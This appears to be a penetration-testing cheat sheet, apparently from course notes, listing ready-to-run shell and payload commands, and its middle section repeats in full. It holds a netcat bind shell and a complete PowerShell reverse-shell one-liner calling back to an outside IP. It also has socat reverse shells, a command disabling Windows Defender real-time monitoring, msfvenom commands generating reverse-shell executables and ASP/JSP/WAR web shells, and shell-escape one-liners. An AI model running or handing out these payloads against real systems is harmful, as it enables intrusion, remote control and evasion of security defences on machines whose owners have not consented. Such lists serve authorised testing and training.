Shells and Payloads

Discover environmental variables of a system to identify the shell language

env

Start netcat listener on a specified port

sudo nc -lvnp <port #>

Connect to a netcat listener

nc -nv <ip_address> <port>

Bind shell using netcat

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f

PowerShell Reverse Shell

### PowerShell one-liner used to connect back to a listener
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Reverse Shell Upgrades

Python Shell Upgrade

python -c 'import pty; pty.spawn("/bin/bash")'

Full TTY Upgrade

stty raw -echo; fg
reset
xterm

Socat Reverse Shell

socat TCP:10.10.14.113:443 EXEC:/bin/bash

Socat Listener

socat TCP-LISTEN:443,reuseaddr,fork EXEC:/bin/bash

Disable Windows Defender Real-Time Monitoring

Set-MpPreference -DisableRealtimeMonitoring $true

Payload Generation with MSFvenom

Linux Reverse Shell Payload

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > nameoffile.elf

Windows Reverse Shell Payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > nameoffile.exe

MacOS Reverse Shell Payload

msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f macho > nameoffile.macho

ASP Web Shell Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.113 LPORT=443 -f asp > nameoffile.asp

JSP Web Shell Payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f raw > nameoffile.jsp

WAR Web Shell Payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f war > nameoffile.war

Shell Spawning Techniques

Python Interactive Shell

python -c 'import pty; pty.spawn("/bin/sh")'

Basic Linux Shell

/bin/sh -i

Perl Interactive Shell

perl -e 'exec "/bin/sh";'

Ruby Interactive Shell

exec "/bin/sh"

Lua Interactive Shell

os.execute('/bin/sh')

Awk Shell

awk 'BEGIN {system("/bin/sh")}'

Find Command for Shell Spawning

find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}\;'
find . -exec /bin/sh \; -quit

Vim Shell Escape

vim -c ':!/bin/sh'

Start netcat listener on a specified port

sudo nc -lvnp <port #>

Connect to a netcat listener

nc -nv <ip_address> <port>

Bind shell using netcat

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f

PowerShell Reverse Shell

### PowerShell one-liner used to connect back to a listener
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Reverse Shell Upgrades

Python Shell Upgrade

python -c 'import pty; pty.spawn("/bin/bash")'

Full TTY Upgrade

stty raw -echo; fg
reset
xterm

Socat Reverse Shell

socat TCP:10.10.14.113:443 EXEC:/bin/bash

Socat Listener

socat TCP-LISTEN:443,reuseaddr,fork EXEC:/bin/bash

Disable Windows Defender Real-Time Monitoring

Set-MpPreference -DisableRealtimeMonitoring $true

Payload Generation with MSFvenom

Linux Reverse Shell Payload

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > nameoffile.elf

Windows Reverse Shell Payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > nameoffile.exe

MacOS Reverse Shell Payload

msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f macho > nameoffile.macho

ASP Web Shell Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.113 LPORT=443 -f asp > nameoffile.asp

JSP Web Shell Payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f raw > nameoffile.jsp

WAR Web Shell Payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f war > nameoffile.war

Shell Spawning Techniques

Python Interactive Shell

python -c 'import pty; pty.spawn("/bin/sh")'

Basic Linux Shell

/bin/sh -i

Perl Interactive Shell

perl -e 'exec "/bin/sh";'

Ruby Interactive Shell

exec "/bin/sh"

Lua Interactive Shell

os.execute('/bin/sh')

Awk Shell

awk 'BEGIN {system("/bin/sh")}'

Find Command for Shell Spawning

find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}\;'
find . -exec /bin/sh \; -quit

Vim Shell Escape

vim -c ':!/bin/sh'

Web Shell Locations

Laudanum Webshells on ParrotOS and Pwnbox

/usr/share/webshells/laudanum

Antak Webshell on ParrotOS and Pwnbox

/usr/share/nishang/Antak-WebShell